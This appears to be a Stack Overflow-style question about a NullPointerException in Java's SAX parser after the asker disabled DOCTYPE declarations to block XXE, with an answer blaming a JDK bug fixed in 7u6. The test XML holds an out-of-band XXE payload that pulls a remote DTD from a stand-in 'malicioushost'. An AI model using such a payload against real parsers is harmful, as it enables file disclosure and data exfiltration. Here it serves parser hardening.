# Getting NullPointerException when dissalowing doctype feature

Tags: java, xml, saxparser

I've set the "http://apache.org/xml/features/disallow-doctype-decl" feature on the SAXParserFactory to true and I'm getting a NullPointerException when parsing an xml that contains an external entity.

Code:

```
SAXParserFactory spf = SAXParserFactory.newInstance();
spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
```

XML:

```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
   <!ENTITY % remote SYSTEM "http://malicioushost/xxe.xml" > %remote; %payload;]>
```

Error:

```
Caused by: java.lang.NullPointerException: null
at com.sun.org.apache.xerces.internal.impl.dtd.XMLDTDProcessor.startDTD(XMLDTDProcessor.java:679) ~[na:1.7.0]
at com.sun.org.apache.xerces.internal.impl.XMLDTDScannerImpl.scanDTDInternalSubset(XMLDTDScannerImpl.java:341) ~[na:1.7.0]
at com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl$DTDDriver.dispatch(XMLDocumentScannerImpl.java:1098) ~[na:1.7.0]
at com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl$DTDDriver.next(XMLDocumentScannerImpl.java:1047) ~[na:1.7.0]
```

Does anyone know what additional settings should be done to avoid that NPE?

I'm using java version: 1.7.0_51

Answer (score 1):

This is a known [bug](http://bugs.java.com/bugdatabase/view_bug.do?bug_id=7157610) in the JAXP RI in JDK versions prior to 7u6 (b15). Upgrading the JDK should solve the issue.